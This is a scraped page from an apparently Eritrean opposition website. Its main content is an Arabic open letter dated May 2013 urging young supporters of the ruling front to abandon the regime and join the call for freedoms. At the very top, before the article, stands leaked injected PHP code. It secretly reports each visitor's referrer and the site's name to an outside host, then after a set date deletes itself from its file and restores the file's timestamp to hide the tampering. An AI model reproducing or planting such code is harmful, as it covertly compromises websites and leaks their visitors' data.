check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } رسالة اخوية الى شبابنا المناصرين للجبهة الشعبية
кремлевская диета

رسالة اخوية الى شبابنا المناصرين للجبهة الشعبية

User Rating: / 1
PoorBest 

 

 

 

 

 

 

 

رسالة اخوية الى شبابنا المناصرين للجبهة الشعبية :

كتبت هذه الكلمات لتذكير شبابنا الذين ما زالوا يدافعون عن تنظيم الجبهة الشعبية ، وانا اعتقد ان وقوفهم معه اليوم ماهي الا مكابرة ، وما اعتقد مساوئ النظام خافية عليهم ، فهم اولى، وادرى من غيرهم بتفاصيلها ، ولكن لا بأس من ان تصل اليهم رسالتي ، لعلها تكون رسالة خير لمن في قلوبهم بقية من الخير، فنحن في حاجة اليوم اكثر من ما مضى ، ان نضع ايدينا في ايدي بعض من اجل وطننا الحبيب الغالي ، الذي هو اغلى علينا من انفسنا ، ولن يفيدنا اليوم الا المصارحة والمكاشفة ، وتنظيمكم قد وضع خطة محكمة حتى يظهر كل المعارضين له ، والمطالبين له بالإصلاح بأنهم أعداء الوطن ، والمواطن ، وبنى بيننا وبينكم سياجات ، وجدارات ، وسدود ، واوجه اليكم حديثي هذا من باب الحب ، وخاصة ها نحن ذا نرى اليوم الكثير من اعمدة النظام تتسابق لغسل يدها من خطيئة النظام ، فلماذا تريدون انتم ان تلطخوا يدكم بدم اهدره غيركم ؟ ولماذا تريدون ان تكونوا وقودا لنار اضرمها غيركم ؟

هل فكرتم جديا ما هو الخلاف بينكم وبين اخوانكم الذين لا ينتمون لتنظيمكم ؟ .

* لسنا نختلف معكم حول نضال اخواننا الذين ضحوا بأرواحهم الزكية لتحرير وطننا الغالي ، والدفاع عن حياضه .

ولسنا نختلف معكم حول ما بذلته قيادة الجبهة الشعبية لتحرير ارتريا من جهد جبارفي قيادة التنظيم .

ولسنا نختلف معكم انكم التحقتم بالتنظيم من اجل استرداد الوطن ، وخدمة المواطن .

ولسنا نختلف معكم في حب وطننا ، والسعي لخدمته ، وحمايته ، والدفاع عنه .

لكن نحن مختلفون معكم في امور اغلبها لو تحاورنا حولها سوف نتفق فيها تماما وذلك على حسب فهمي  ، ومنها :

1- نحن نريد ان يكون الإنسان الإرتري كريما وعزيزا ...... وانتم كذلك .

2- نحن نريد ان يحكم شعبنا بالقانون ....... وانتم كذلك .

3- نحن نريد ممن يحكم هذا الشعب ان يختار من قبل الشعب ، وليس ان يفرض عليه ...........   وانتم كذلك .    

4- نريد ممن يتقدم للحكم ان يعرض علينا برنامجه في عملية تنافسية ، و الشعب  يختار ما يراه مناسبا له من البرامج ........ وانتم كذلك .

5- نريد ان تهدم كل السجون التى بنيت لأصحاب الراي والفكر من المعارضين ............ وانتم كذلك.

6- نريد ان يتجنب هذا البلد الصراعات القبلية ، والطائفية ، وان تكون المواطنة هي اساس الحقوق ، والواجبات ....... وانتم كذلك .

* في الماضي كنا نختلف حول النظام الحاكم ، كنتم ترونه النظام المثالي ، وكنا نراه نظاما ظالما ، لكن ما اعتقد اليوم لو صدقت نيتكم ، وحبكم لشعبكم ، ووطنكم سوف نختلف حوله في شيئ ، واسمحوا لي ان اذكركم بما يفعله هذا النظام الذي ما زلتم تابعون له .

1- اقصى ، واحتقر ، أغلب المناضلين الذين اسسوا الثورة الإرترية من الآباء التاريخيين ، وفرق بينهم ، فرفع اناس منهم في السماء ، وحرم البعض منهم حتى بعد موته ان يدفن في تراب بلده .

2- الشعبية دفنت كل التاريخ ، رموزا ، ومعارك ، وقيادات ، وبدات تتحدث فقط عن تاريخ تنظيمها ، ففي الشخصيات ، هل سمعتم يوما عن تاريخ ، عمر ازاز ، طاهر سالم ، وللوا ، شمسي ، حليب ستي ، سعيد حسين ، حسين خليفة ، محمد اسماعيل عبده ، عبد الله ادريس ، حسن على اسد ، حامد تركي ، الزين يسن ، المناضلة جمعة ، ديقول ، عثمان زرؤوم ، احمد ناصر ،عثمان سبي ، .......... الخ من بذلوا اموالهم ، وارواحهم من اجل هذا الوطن ؟ ، وطبعا لا اريد ان اذكركم بالأسماء التى تُمَجدْ الليل ، والنهار، وغالبيتها جاءت في الساحة بعدما اشتد عود الثورة ، ولولا ماذكرت لكم وغيرهم ( لولاهم ) لما كانت القيادات التى تمجدونها ، وتمدحونها .

3- هل سمعتم بمعركة تقوربا ؟ هل سمعتم بجبل أدال ؟ هل سمعتم بتحرير مدينة اغردات ؟ هل سمعتم بحرق وازنتت ؟ هل سمعتم بإبادة عد ابرهيم ؟ هل سمعتم بمعركة حلحل ؟ هل سمعتم بمجزرة حرقيقوا ؟ هل سمعتم بالفدائيين الذين كانوا يغضون مضاجع الإستعمار في العاصمة وباقي المدن ؟ ولست اقصد بالسماع ما حكاه لكم الآباء ، او قرأتموه في الكتب ، ولكن في اعلام تنظيمكم ، مذياعا ، وتلفازا ، ومسرح ، وجريدة .

4- هل سألتم انفسكم لماذا حارب تنظيكم علم البرلمان الإرتري ؟

5- هل سألتم انفسكم لماذا حاربت الجبهة الشعبية اللغة العربية ؟

7- هل سألتم انفسكم لماذ اجبرت المسلمة ان تتزوج بمسيحي ؟ ولماذا بذلت كل جهدها لإخراج المراة المسلمة عن تقاليدها ، واجبرتها ان تجلس في الإجتماعات مع الرجل ؟ ولماذ اخرجتها للأعمال الشاقة ؟

8- هل سألتم انفسكم لماذا حولت الشعبية البلد الى سجن كبير ، حيث سجنت العلماء والدعاة ، والقساوسة ، والصحفيين ، والعمال ، والمزارعيين ، والمدرسين ، والجنود الغير مرغوب فيهم ، والفنانين ، والقيادات المطالبين بإصلاح التنظيم ؟

9- هل سألتم انفسكم لماذا  تحول المواطن الى اجنبي داخل بلده ، بحيث اذا اراد السفر داخل البلد عليه ان يحصل على تصريح ؟ وإذا اراد السفر خارج بلده فهو ممنوع ؟ وإذا اراد استخراج مستند وهو في الخاج فعليه دفع مكوس ، وأتاوات اكبر من دخله ؟ وإذا اراد داخل البلد ان يحصل على شريحة تلفون عليه احضارإثبات شخصيته ؟ بل تنتزع منه ارضه ، او يجبر في ترك مسقط رأسه ؟

10 – هل سألتم انفسكم لماذا المنح التى تمت منذوا الإستقلال ، بل قبله ، كان اغلبها لصالح فئة واحدة من المجتمع الإرتري ؟

11- هل سألتم انفسكم لماذا دخل النظام في حروب ضروس مع جميع دول الجوار ؟

12 – هل سألتم انفسكم لماذا منع الصوم ، والصلاة في اوساط الجيش والأمن ، ومراكز الشباب والتدريب ، مثل ساوا .

13 – هل سألتم انفسكم لماذ يهرب الشعب الإرتري من بلده ؟

14 – هل سألتم انفسكم لماذا تدان ارتريا سنويا من المنظمات الدولية في مجال حقوق الإنسان ؟

15 – هل سألتم انفسكم لماذا ارتريا افقر بلد في العالم ؟

16 – هل سالتم انفسكم كيف يدار المال في ارتريا ؟

17 – هل سالتم انفسكم لماذا لا يجرء احدكم على سؤال اسياس افورقي لماذا هو في السلطة طوال هذه السنوات ؟

18 – هل سألتم انفسكم لماذا لا يوجد قضاء في ارتريا ؟ لماذا لا يحاكم المواطن ولو محاكمة عسكرية ؟ ولماذا لا يحق له ان يزار من قبل اهله ؟

19 – هل سألتم انفسكم لماذا تطارد الجبهة الشعبية ، وتغتال ، وتشوه ، كل من يخالفها في الراي ؟

20 – هل سألتم لماذا انهي اسياس افورقي تنظيمكم الجبهة الشعبية ، بحيث انتهت تشكيلاته ، وقياداته ، واداراته ، ومؤتمراته ؟

لن اطيل عليكم اكثر من هذا ، ولكن اردت فقط ان تفكروا في اسباب بقائكم مع هذا النظام حتى اليوم ؟ هل لو سجن النظام اختكم ، او امكم ، او اباكم ، او اخاكم ،سوف تستمرون في مناصرته ؟ ان قلتم نعم: ! فلا شك لن نتفق في شيئ لأن من ذكرتُ هم بمنزلة الروح منا من الجسد ، وإن قلتم لا :   اليس من سجن ، وقتل ، وشرد من الشعب الإرتري اخوانكم ؟ ام اخوانكم فقط من انتمى في تنظيمكم ، او ولد من ابويكم ؟ الم تهزكم صور اخوانكم الذين ماتوا في الصحاري ، والبحار ، ومن فتت اجسامهم ، واصبحوا قطعا للغيار ؟ الم يحزنكم تفريغ البلد من شبابها ؟ الم يحزنكم فريقنا القومي يترك ملعب الكرة ويهرول هاربا في شوارع عواصم العالم ؟ الم تؤلمكم مناظر آبائكم الكبار ، وهم يستندون على عصي ، وهم يحلمون ان يدفنوا في بلدهم ؟

 يا إخواننا : بيننا وبين عيد الإستقلال مقدار فرسخ او اقل ، وسوف يظهر افورقي يتباهي بإنتصاراه ، وانجازاته ، وقيادته الحكيمة ! فهل هذه المهزلة مقبولة عندكم ؟ ما اظنكم تقبلون هذا اليوم ، فاليكن قراركم من اجل شعبكم الوقوف في وجه هذا الظلم ، والإنضمام الى مناصرة جيشنا البطل الذي بدء في واحد وعشرين يناير خطوته الجريئة ، ومناصرة القوة المطالبة بالحريات ، وحقوق الأنسان ، وكرامته . فإن لم تفعلوها اليوم فمتى سوف تفعلونها ؟ ولن يفيد إن شقاكم عن النظام شيئا للشعب الإرتري ، ولكن نريد منكم انضمامكم الى صف المطالبين بالحريات ، والعدالة ، والمساواة ، والتسامح .

أخوكم / محمد جمعة ابو الرشيد

5/مايوا/2013م

 

             

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس